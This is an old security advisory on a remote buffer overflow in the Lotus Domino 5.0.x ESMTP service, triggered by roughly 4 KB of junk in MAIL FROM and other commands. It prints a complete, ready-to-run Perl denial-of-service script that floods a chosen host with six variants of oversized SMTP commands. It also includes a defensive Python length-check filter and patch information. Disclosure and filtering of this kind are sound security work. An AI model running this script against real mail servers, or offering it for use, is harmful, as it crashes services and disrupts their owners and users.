COMMAND

    Lotus ESMTP Service

SYSTEMS AFFECTED

    Lotus Domino Release 5.0.1 (Intl)

PROBLEM

    Michal Zalewski found the following.  Not much to say.  While
    performing basic input validation checks against the Lotus Domino
    ESMTP service (see subject) running on top of a Windows NT system
    (this probably applies to other platforms as well), within
    approximately 30 seconds he found a remote buffer overflow leading
    to a system crash (and, if exploited, to remote system compromise).
    Now, the facts:

        220 *SNIP* Lotus Domino Release 5.0.1 (Intl) *SNIP*
        HELO dood
        250 *SNIP*
        MAIL FROM: me@<four-kilobytes-of-junk>
        (crash)

    This has been confirmed on r5.0.2b on a Sun E420R with a patched-up
    Solaris 7 and on WinNT4 (SP6), and on 5.03 (US version; it crashed
    the nSMTP.EXE task).

    Here's the test script:

    #!/usr/bin/perl
    # Needs Net::Telnet to run
    # Expl0it By smiler@vxd.org
    # Tested with success against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
    # CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
    # and probably many others that I hadn't a chance to explore.
    # I wrote this after Michal Zalewski brought this issue up on BugTraq.
    # Cheers 351 and FractalG :)

    use Net::Telnet;

    print "SmtpKILL By smiler\@vxd.org\n";

    if (not $ARGV[1]) {
        print qq~
    Usage : smtpkill.pl  <type> <host>
        <type> Type of attack :
            type 1 = long mail from: someone\@4k_of_junk
            type 2 = long rcpt to: someone\@4k_of_junk
            type 3 = long helo longdomain_with_4k_of_junk
            type 4 = long undefined command (4k_of_junk)
            type 5 = long help 4k_of_junk
            type 6 = long mail from: and mail to:

        <host> Host that you want to DOS, IP or domain will be ok.
    Example Usage : smtpkill.pl 5 127.0.0.1
    ~;
        exit;
    }

    $type   = $ARGV[0];
    $target = $ARGV[1];

    print "TYPE ATTACK: $type\n";
    print "TARGET : $target\n";

    # Each iteration opens a fresh connection and sends the chosen
    # command padded with $i copies of 'ptrulez'.
    for ($i = 4096; $i < 5096; $i++) {
        $obj = Net::Telnet->new(Host => "$target", Port => 25);

        if ($type =~ "1") {
            $helo = "helo ptrulez";
            $from = "mail from: v0v0@" . 'ptrulez' x $i;
            $rcpt = "rcpt to: v0v0\@v0v0.pt";
        }

        if ($type =~ "2") {
            $helo = "helo ptrulez";
            $from = "mail from: v0v0\@v0v0.pt";
            $rcpt = "rcpt to: v0v0@" . 'ptrulez' x $i;
        }

        if ($type =~ "3") {
            $helo = "helo " . 'ptrulez' x $i;
            $from = "mail from: v0v0\@v0v0.pt";
            $rcpt = "rcpt to: v0v0\@v0v0.pt";
        }

        if ($type =~ "4") {
            $helo = "havesomefun" . 'ptrulez' x $i;
        }

        if ($type =~ "5") {
            $helo = "help " . 'ptrulez' x $i;
        }

        if ($type =~ "6") {
            $helo = "helo ptrulez";
            $from = "mail from: " . 'ptrulez' x $i;
            $rcpt = "rcpt to: " . 'ptrulez' x $i;
        }

        print "$helo\n"; $obj->print("$helo");
        print "$from\n"; $obj->print("$from");
        print "$rcpt\n"; $obj->print("$rcpt");
        $obj->close;
    }
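    As an added example that is not part of the advisory or the script
    above: the argument-length checks (RFC 5321 limits) that a hardened
    SMTP front end or mail-gateway filter applies to each command line
    before parsing it, run over a constructed session mirroring the
    transcript above.  The function names, the sample lines and the
    4096-byte junk value are assumptions made for this example.

```python
import re

# RFC 5321 section 4.5.3.1 minimum maximums, in bytes. Servers may accept
# more, but the page's 4 KB MAIL FROM argument exceeds every one of them.
MAX_LOCAL_PART = 64
MAX_DOMAIN = 255
MAX_PATH = 256          # whole reverse-/forward-path incl. "<" and ">"
MAX_COMMAND_LINE = 512  # whole line incl. trailing CRLF
MAX_HELO_ARG = 255      # HELO/EHLO argument is a domain or address literal
_PATH_RE = re.compile(r"^(MAIL FROM|RCPT TO):\s*(.*)$", re.IGNORECASE)

def check_smtp_line(line):
    """Return (accepted, reason); measure first, parse second, since the
    crash on this page came from copying an unbounded argument into a
    fixed-size buffer."""
    raw = line.rstrip("\r\n")
    if len(raw.encode("latin-1", "replace")) + 2 > MAX_COMMAND_LINE:
        return False, "command line longer than %d bytes" % MAX_COMMAND_LINE
    m = _PATH_RE.match(raw)
    if m:
        verb, path = m.group(1).upper(), m.group(2).strip()
        if len(path) > MAX_PATH:
            return False, "%s path longer than %d" % (verb, MAX_PATH)
        addr = path.strip("<>")
        if addr:  # the empty reverse-path "<>" is legal for MAIL FROM
            local, sep, domain = addr.rpartition("@")
            if not sep:
                return False, "mailbox lacks @"
            if len(local) > MAX_LOCAL_PART:
                return False, "local-part longer than %d" % MAX_LOCAL_PART
            if len(domain) > MAX_DOMAIN:
                return False, "domain longer than %d" % MAX_DOMAIN
        return True, "ok"
    verb, _, arg = raw.partition(" ")
    if verb.upper() in ("HELO", "EHLO") and len(arg.strip()) > MAX_HELO_ARG:
        return False, "HELO argument longer than %d" % MAX_HELO_ARG
    return True, "ok"

# Constructed session mirroring the page's transcript; the last line carries
# a 4096-byte junk domain like the one that crashed the nSMTP.EXE task.
SAMPLE_SESSION = [
    "HELO dood",
    "MAIL FROM: me@example.org",
    "RCPT TO: <postmaster@example.org>",
    "MAIL FROM: me@" + "A" * 4096,
]

def audit_session(lines):
    """Return the rejection reason for every line that fails the checks."""
    return [why for ok, why in map(check_smtp_line, lines) if not ok]
```

    Rejecting on length before the address is ever parsed is the check
    the vulnerable service lacked; the same limits work as a detection
    rule over captured SMTP command lines.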

SOLUTION

    Upgrade modules are available.  Version 5.0.2c (Intl) is not
    vulnerable.  Merak Server Version 2.10.270 is also not vulnerable.

    However, officially this bug has been fixed in Domino 5.04.  This
    version of Domino is not available yet (not even as a QMR update).
    Customers can request a hotfix if needed.